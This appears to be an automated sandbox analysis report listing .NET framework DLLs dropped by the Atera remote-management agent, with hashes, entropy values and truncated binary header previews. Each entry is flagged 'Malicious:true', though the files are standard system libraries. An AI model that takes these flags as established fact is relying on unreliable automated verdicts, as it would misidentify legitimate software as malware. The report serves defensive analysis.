                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..h.............. ........... ..............................S2....@.................................u...O.......8............x..((........................................................... ............... ..H............text....f... ...h.................. ..`.rsrc...8............j..............@..@.reloc...............v..............@..B........................H.......P'..\8..........._...%..,.......................................j~....%-.&(F...s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2rI..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r9..p.(....*2rm..p.(....*2r...p.(....*2r...p.(....*2r=..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Csp.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.894751959894498
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:aTI2pWPzWmWeNyb8E9VF6IYijSJIVxWxypPVl:aE3bnEpYi60ppdl
                                                                                                                                                                                                                                                                                              MD5:1E749386BCBB0C2CDE9943DA1C26B888
                                                                                                                                                                                                                                                                                              SHA1:78DA8BAFFBF345B40169BE1DCCDAA27D475F7FF6
                                                                                                                                                                                                                                                                                              SHA-256:6D4513B6C865C7AC7A190C24D0CFBC433C94AC85D4F562A1D0A6590F970C8B57
                                                                                                                                                                                                                                                                                              SHA-512:CEF289B0C237E35E1DE3D737CEA9FBC4C64F4057C04B748B3D084124C29924366F7893564D20B1389CD37F770C219698D26534D833F40371497575B737FC67A0
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............^)... ...@....... ...................................@..................................)..O....@..`...............((...`.......'............................................... ............... ..H............text...d.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................@)......H.......P ......................T'......................................BSJB............v4.0.30319......l.......#~..,.......#Strings............#US.........#GUID...........#Blob......................3......................................z...........A...\.A...0.....a.....D.................C.................[.....x.....-.........................(.....(.....(...).(...1.(...9.(...A.(...I.(...Q.(...Y.(...a.(...i.(...q.(.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.911553918502177
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Icezoy4W04WGINyb8E9VF6IYijSJIVxmij:IBzoy+kgEpYi60v
                                                                                                                                                                                                                                                                                              MD5:38A6DB7CB798CB523B65AE8483180BCD
                                                                                                                                                                                                                                                                                              SHA1:3CB1A3BD6A5DA5FC4FC222B08866AF114FF81092
                                                                                                                                                                                                                                                                                              SHA-256:11EF185307480DAC3754B67727BBEAE74C6709A437D7D0E8BBC642A3C2A43F7F
                                                                                                                                                                                                                                                                                              SHA-512:66081322B339883F5DBDE57E01552D1868DE7139B70FE7E8AE1061D31420B28F58507EC918333884347C2328862CA9AF431BB71A2C40FCAB1F3456291C0527BE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............~)... ...@....... ....................................@.................................,)..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`)......H.......P ..$...................t'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID....... ...#Blob......................3..................................................f...o.f...C.S.........W.................V...........%.....n...........@.....)...................M.....M.....M...).M...1.M...9.M...A.M...I.M...Q.M...Y.M...a.M...i.M...q.M.......................#.....+.....3.....;.'...C.B...K.b...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.795177677038789
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:yH/JWKpWDQNyb8E9VF6IYijSJIVxXuKsa:yH/j8oEpYi60v
                                                                                                                                                                                                                                                                                              MD5:0F6C0A12BFB3ED8DBF456438FD858420
                                                                                                                                                                                                                                                                                              SHA1:0E5A9F3FBF695A223538E4D821AC1F308FAC4483
                                                                                                                                                                                                                                                                                              SHA-256:413F2327A3AE6170709DBC05BE4B677C41AC516446D2883D414B8464268F8D15
                                                                                                                                                                                                                                                                                              SHA-512:97EF267FBEFE42BBA8AD718B4295291A21BC35956E222F6DB3482F4222B44D7EAEA6CCCA6C3F713734F2A9A9410992F16956D3A6AE4B2B8AE351EDF5F6B9E505
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0............."*... ...@....... ....................................@..................................)..O....@..................((...`.......(............................................... ............... ..H............text...(.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...$...#~..........#Strings............#US.........#GUID....... ...#Blob......................3............................................................o.s...........D.....D.....D.....D...8.D...Q.D.....D.....D...l.....U.D.................m.....m.....m...).m...1.m...9.m...A.m...I.m...Q.m...Y.m...a.m...i.m...q.m.......................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.X509Certificates.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16936
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.745657963583126
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:+TjbocNsWMhWqiNyb8E9VF6IYijSJIVxtLC8y:uboYyFiEpYi60ts
                                                                                                                                                                                                                                                                                              MD5:86A808028274E9D6DF90714621E06353
                                                                                                                                                                                                                                                                                              SHA1:3A47D7A175BE7B44851C5AF8967EC330D2E7825A
                                                                                                                                                                                                                                                                                              SHA-256:8A25793A632ECF02D29D7FFAC07DBEC187B4A0FE9B46A4BA44E6BE5CE3D08E89
                                                                                                                                                                                                                                                                                              SHA-512:20F8F4A9D92528EC742058CAAC5E0B7CCFB36CA5910E5315D9EF0B675626A17A5B328A15CE1269524ECB794C9E4DC4B8AE1121C774FA5628B2E21F944AA71360
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.................. ...@....... ..............................S.....@..................................-..O....@..................((...`.......,............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P .......................,......................................BSJB............v4.0.30319......l.......#~......|...#Strings....x.......#US.|.......#GUID.......(...#Blob......................3................................'.....).........u.................=......."...:."...W.".....".....".....".....".....".....[.....".................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;./...C.J...K.j...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Principal.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.845358763894717
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:vSKiWIhWG3Nyb8E9VF6IYijSJIVxLp8Bz:vSK8l7EpYi6092
                                                                                                                                                                                                                                                                                              MD5:E971856435385A977E2E0841EB2C15F1
                                                                                                                                                                                                                                                                                              SHA1:2F03E049E9F205BD9A7A710DAB3E143A77CDE03D
                                                                                                                                                                                                                                                                                              SHA-256:D50DE679C339893F84ED644A6A632816D8B1C38C961BC4835C81604318CE7B36
                                                                                                                                                                                                                                                                                              SHA-512:2063A3219789C12308FA04D79380D6D801242292E22DBAA6808727147EDB27A62C4728F0867E91374A5C5FAD8AA98168A66394E23D59EE3D7AE65CD7FB1BB8CA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ..............................b.....@.................................t(..O....@.. ...............((...`......<'............................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B.................(......H.......P ..l....................&......................................BSJB............v4.0.30319......l.......#~......@...#Strings....D.......#US.H.......#GUID...X.......#Blob......................3......................................................\.....0.....'.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.6...K.V...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.SecureString.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.786849563106118
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:D0KbZWApWmWTpWSDNyb8E9VF6IYijSJIVxkp8hEXO:YKRyhfEpYi603+XO
                                                                                                                                                                                                                                                                                              MD5:FE9772147C5C4EFB20A6B0F16B53C1A7
                                                                                                                                                                                                                                                                                              SHA1:4D50591115EFE5667CC5CCF0E69ADC730006E9F8
                                                                                                                                                                                                                                                                                              SHA-256:28965739D1C84F05DDFB4C4599296C8F06E33368948F9BA285990986EACFFC2F
                                                                                                                                                                                                                                                                                              SHA-512:30D0D3470993FBF5CF56401703B2FA3DBB981079775E00A1F25CC9BB4228108D862395C05E8C01CFD885C8D7AAD463BFA3948524753F9DD5C6D6CFFCD369BB47
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............)... ...@....... ...................................@.................................>)..O....@..................((...`.......(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................r)......H.......p .......................(........................................(....*..(....*..(....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings....`.......#US.h.......#GUID...x...(...#Blob...........G..........3.............................................."...........C...........u...............m.b...........J.....J.....J.....J...6.J...O.J.....J.....J...j.C...S.J.............................P ............X ............` ......4.....h ....................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.Extensions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.874592163148146
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:7b1nWCXWr7Nyb8E9VF6IYijSJIVxnY3EeGFI:n7yXEpYi60XG
                                                                                                                                                                                                                                                                                              MD5:F872FC903187D5D0275C030AC0DFA5DB
                                                                                                                                                                                                                                                                                              SHA1:BB660C49EE9EB96B4EA37167C39A5F299AE49556
                                                                                                                                                                                                                                                                                              SHA-256:F4525AF58D2ED7A084286EB71947F6A29F712250DC2510895311E63BF0B62ED9
                                                                                                                                                                                                                                                                                              SHA-512:D50C68F3EAA788CCCB12E7833F28A5947CB42B6FBE51FE8A39FEC7EEAF6A2FCED526D38510E2F2C81044F378A26D38869EA82C196AA23F90744E629FD6E74A8C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................1.....@..................................(..O....@..T...............((...`.......'............................................... ............... ..H............text... .... ...................... ..`.rsrc...T....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~.. ...t...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....6.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.776067478918499
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:rLyW7TWyDNyb8E9VF6IYijSJIVxRr97pB:3fPfEpYi60v
                                                                                                                                                                                                                                                                                              MD5:2703B21B5529FA915CFC0AB5F733F505
                                                                                                                                                                                                                                                                                              SHA1:0CE6AA2D3345DECAD00A96A1C217C7D8D6115573
                                                                                                                                                                                                                                                                                              SHA-256:66B895DA76E875772D6057DBE0763CB5A5E68D3D806E846C549A0D663914A348
                                                                                                                                                                                                                                                                                              SHA-512:4DBB5556462BDA198CA119777DC89F5A31EAFECDB0B1F7BAD4AF29A1F49E8AD5CFDD08B52C8FBF7DA6352DB062593B1842734194C237D4F0EA93DA986939F2F9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............2*... ...@....... ...............................`....@..................................)..O....@..................((...`.......(............................................... ............... ..H............text...8.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ......................((......................................BSJB............v4.0.30319......l...0...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0...........D.7.....7.....7...C.7.....7.....7...[.7...x.7...-.0.....7.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.905928977470625
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:K6Rb32WVzWwtNyb8E9VF6IYijSJIVx0kfw:lRb3dtJEpYi60E
                                                                                                                                                                                                                                                                                              MD5:DDF80C084EF5E94367B10D304CEBF007
                                                                                                                                                                                                                                                                                              SHA1:ECDBCDFE7EFB3FFC837DE9AEA7F364488A73E6FB
                                                                                                                                                                                                                                                                                              SHA-256:0BBB884A72284397444636FC9524BD36A18EB9F08FF0513DC58F1410F4B5E2F3
                                                                                                                                                                                                                                                                                              SHA-512:A590DEEB9B42DE2CBA518A7522FE48620AA4CE9EE4031A5D85F8D7654C6E9B0862073DC65866364B1A49543D6FF9A3D1D2E041D3A7E9E299E61D32E48C1100D5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ...............................i....@.................................t)..O....@..P...............((...`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....@.......#US.D.......#GUID...T.......#Blob......................3..................................................K...d.K...8.8...k.....L.................K.................c...........5.........................2.....2.....2...).2...1.2...9.2...A.2...I.2...Q.2...Y.2...a.2...i.2...q.2.......................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Overlapped.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):31784
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.537588468799282
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:6u5I+sqOylryry8qqIfUc7a5eMEpYi60+a:6YIVBpry8qqIfUcm5eF76Za
                                                                                                                                                                                                                                                                                              MD5:240E33A65BF76FE22C53C51334794F49
                                                                                                                                                                                                                                                                                              SHA1:3DD0F8463267A2817692A2609F938AB4BC8A9323
                                                                                                                                                                                                                                                                                              SHA-256:F1A5E6E1BCD3BA5DF7769FD57CAFB4148F277DC4D01D7E92277932B3207F7DEC
                                                                                                                                                                                                                                                                                              SHA-512:877E2D9132D72E56C15B5653553AC8CB4DEF7E99C93C42F91422B6032CC3BDADFFBA138EB47055C8F066BAABE75C7C9FDD3B4BE478817D3E9442B42E3E3D7D53
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..F...........d... ........... ..............................,.....@..................................c..O.......x............T..((...........c............................................... ............... ..H............text....D... ...F.................. ..`.rsrc...x............H..............@..@.reloc...............R..............@..B.................c......H........&...7...........^.......b......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2rK..p.(....*2ry..p.(....*2r...p.(....*2r...p.(....*2rc..p.(....*......(....*..0..;........|....(......./......(....o....s

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.Parallel.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.876610036932806
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Gvn4HREpWiQWtIANyb8E9VF6IYijSJIVxeWDNLPt:ZS/I4EpYi60/t
                                                                                                                                                                                                                                                                                              MD5:800E60AF916F68B7FE83A7BA7977D2AB
                                                                                                                                                                                                                                                                                              SHA1:12358E012D8593AEC3C7B56829AD6FFC3D6AC6C4
                                                                                                                                                                                                                                                                                              SHA-256:F19D8C45F0B46C3ACE374CE95A4DE007BBAB4EFD758E0B919189284FCF441A7A
                                                                                                                                                                                                                                                                                              SHA-512:7C5160DCD50830381D3A3AF000985A397592D2E29055DCD1796E5019B842FEB37681C3BE733FC9A44F2F57C171C4FAA6151CEB6261C3A760504D41F67709545B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................^6....@..................................(..O....@..P...............((...`......x'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......l...#Strings....|.......#US.........#GUID...........#Blob......................3......................................................n.....B.....".....V.................U...........$.....m...........?.....(...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.770984279504455
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:u8MjKb47T3UCcqFMkJ59WdtWcnNyb8E9VF6IYijSJIVxo7E:rMjKb4vcGdO7LEpYi60F
                                                                                                                                                                                                                                                                                              MD5:CF3AD5E39C44790E7153D98DBDD75957
                                                                                                                                                                                                                                                                                              SHA1:4F2051AE5E7CBB044D3E644A12A158E3DF25ACC8
                                                                                                                                                                                                                                                                                              SHA-256:E273B1437CA235BAE1882C11AE30E4455D6C1126EC3ED8A5C725C72F2EC0F019
                                                                                                                                                                                                                                                                                              SHA-512:5DC888194516F8CF2898115F82917D72BF959E0E2363E8D05B9673B47AD2E508D3F5AF9B07308AD799A6652C8B8A5ED9C643A93851F554829638FF3B221B63AC
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............,... ...@....... ....................................@.................................`,..O....@..................((...`......(+............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P ..X....................*......................................BSJB............v4.0.30319......l...<...#~..........#Strings....4.......#US.8.......#GUID...H.......#Blob......................3................................!.....O.......................................].....z.............................7.......j...........n...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Thread.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.854623689785651
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:RzyNXd4+BW6FWqkNyb8E9VF6IYijSJIVxDYhgsz9u:sztEEpYi60cX9u
                                                                                                                                                                                                                                                                                              MD5:B7EF0237654140B400D9575B3348A0A3
                                                                                                                                                                                                                                                                                              SHA1:7FB92D1A2A22DAE79495A706D0731BE11F8DE152
                                                                                                                                                                                                                                                                                              SHA-256:21A13851A9AB68F913E6FF595A7A9EEB28C5BB2897E0FD4F4F7D754AA3DD4567
                                                                                                                                                                                                                                                                                              SHA-512:FC8D5BB1488B006907994A9B5707355600FA8EE678F1BC2FDAAC486E880DA1E49556EEFF0E9A3A92059F88850CB74F72DDCB126380D28B6026F932A0D0F256B4
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................I.....@..................................(..O....@..................((...`.......'............................................... ............... ..H............text... .... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..,...p...#Strings............#US.........#GUID...........#Blob......................3..................................................'.....'...T.....G.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.ThreadPool.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.858929061681379
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:8vs2Q3HKJNrWWRWfUANyb8E9VF6IYijSJIVxm860hHS1cNF:8uM0xEpYi60P/HS12F
                                                                                                                                                                                                                                                                                              MD5:7A8109EB3BDB2109EB3943D308653760
                                                                                                                                                                                                                                                                                              SHA1:E166A011944F07AF9E235CADFE60FC63FDA2C90B
                                                                                                                                                                                                                                                                                              SHA-256:7FC7700777C084406A0408650880D0DC341395CEAC70A1050C97655EAB47A84F
                                                                                                                                                                                                                                                                                              SHA-512:EFB62188F74A365BEF8E9E6DC593CC7A2E3B15C0F60F3F0D921D327D3C58AFD48164B3754DBAD5DC4277FEAA275705A65929818214289344245D9CDBA10AF1DF
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
